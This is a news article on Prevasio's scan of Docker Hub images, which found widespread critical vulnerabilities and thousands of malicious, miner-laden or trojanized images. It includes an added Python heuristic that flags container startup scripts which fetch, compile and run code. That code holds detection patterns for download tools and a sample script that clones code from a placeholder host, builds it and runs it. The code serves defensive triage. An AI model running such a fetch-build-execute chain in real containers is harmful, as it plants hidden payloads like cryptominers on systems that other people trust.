51% of 4 million Docker images have critical vulnerabilities


Prevasio, a cybersecurity startup, has announced that it has finished scanning 4 million container images on Docker Hub. Nearly 51% of the images have critical vulnerabilities, and nearly 6,500 of them can be considered malicious.

A dynamic sandbox system was used by Prevasio to download and build images into the Docker containers
Key Facts
  1. According to Prevasio’s analysis, half of all the images available on Docker Hub have critical vulnerabilities due to outdated software. The analysis also found that thousands of images are in reality dangerous software, many of them potentially attack tools.

  2. According to Prevasio, the malicious containers, nearly 0.16% of the total, have been downloaded more than 300 million times. They were classified as malicious due to the presence of malware, hacking tools, cryptocurrency miners, and trojanized applications.

  3. The startup also uncovered images with dynamic payloads: the original image does not look malicious, but it is scripted to run a miner whose source code is downloaded, compiled and then executed.

  4. Prevasio used a dynamic sandbox system to download the images and build them into Docker containers, then ran the containers to detect vulnerabilities and dangerous behavior.
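The dynamic-payload pattern in key fact 3 can also be triaged statically by checking whether a container's startup script fetches code, compiles it and then runs the result. The Python below is an added example, not Prevasio's sandbox or code from its report; the patterns, function names and both sample scripts are constructed assumptions.

```python
import re

# Heuristic patterns: assumptions made for this example, not an exhaustive list.
FETCH = re.compile(r"(curl|wget|git\s+clone)\b")
COMPILE = re.compile(r"(gcc|cc|clang|make|cmake|go\s+build|cargo\s+build)\b")
# A program started from a relative path or a world-writable directory.
EXECUTE = re.compile(r"(exec\s+|nohup\s+)?(\./|/tmp/|/dev/shm/)\S+")
ORDER = [("fetch", FETCH), ("compile", COMPILE), ("execute", EXECUTE)]

def split_commands(script):
    """Split a shell script into simple commands (naive: ignores quoting)."""
    commands = []
    for line in script.splitlines():
        line = line.split("#", 1)[0]  # drop comments and the shebang
        parts = re.split(r"&&|\|\||[;|]", line)
        commands += [p.strip() for p in parts if p.strip()]
    return commands

def find_dynamic_payload(script):
    """Return [(stage, command), ...] if fetch, compile and execute occur
    in that order in the startup script; otherwise return []."""
    chain = []
    for cmd in split_commands(script):
        stage, pattern = ORDER[len(chain)]
        if pattern.match(cmd):
            chain.append((stage, cmd))
            if len(chain) == len(ORDER):
                return chain
    return []

# Constructed sample: startup script that builds what it runs at container start.
SUSPICIOUS = """#!/bin/sh
git clone https://example.invalid/src.git /tmp/src
cd /tmp/src && make
./worker --threads 4 &
"""

# Constructed sample: entrypoint that starts a binary already shipped in the image.
BENIGN = """#!/bin/sh
curl -fsS http://localhost:8080/healthz || true
exec ./server --port 8080
"""

if __name__ == "__main__":
    for name, script in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        chain = find_dynamic_payload(script)
        print(name, "->", "REVIEW" if chain else "ok")
        for stage, cmd in chain:
            print(f"  {stage:8} {cmd}")
```

Fetching and compiling during the image build is routine, so the check is meaningful only for what runs at container start, and it complements rather than replaces running the image in a sandbox.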


Prevasio’s report concluded that Linux OS, and Linux containers in particular, are not immune to security risks. Nearly half of all container images hosted on Docker Hub contained one or more critical vulnerabilities and were potentially exploitable. Only one-fifth of all the images tested by the startup had no disclosed vulnerabilities.

The software supply chain needs more security effort. More attackers have begun identifying weaknesses and slipping malicious software onto employees’ computers, bypassing perimeter security.

Docker adoption has become normal for most enterprise-class complex applications, with several large enterprises implementing Docker containers in some form. With containerization available everywhere, the attack surface has increased exponentially. As such, Prevasio’s analysis report should be of great concern to any enterprise customer.

Prevasio warned that if a company’s developer takes a shortcut by fetching a pre-built image instead of building one anew, there is a huge risk that the pre-built image has been trojanized. When such images end up in production, they give attackers easy access to containerized applications via a backdoor.

"Every month there is some bad guy upping their game and utilizing more containers as part of their attack. We expect it to be more prevalent because it is very easy to use a Docker container to trick a target into building the attack tools inside their own network."
Rony Moshkovich
CEO and Co-founder, Prevasio
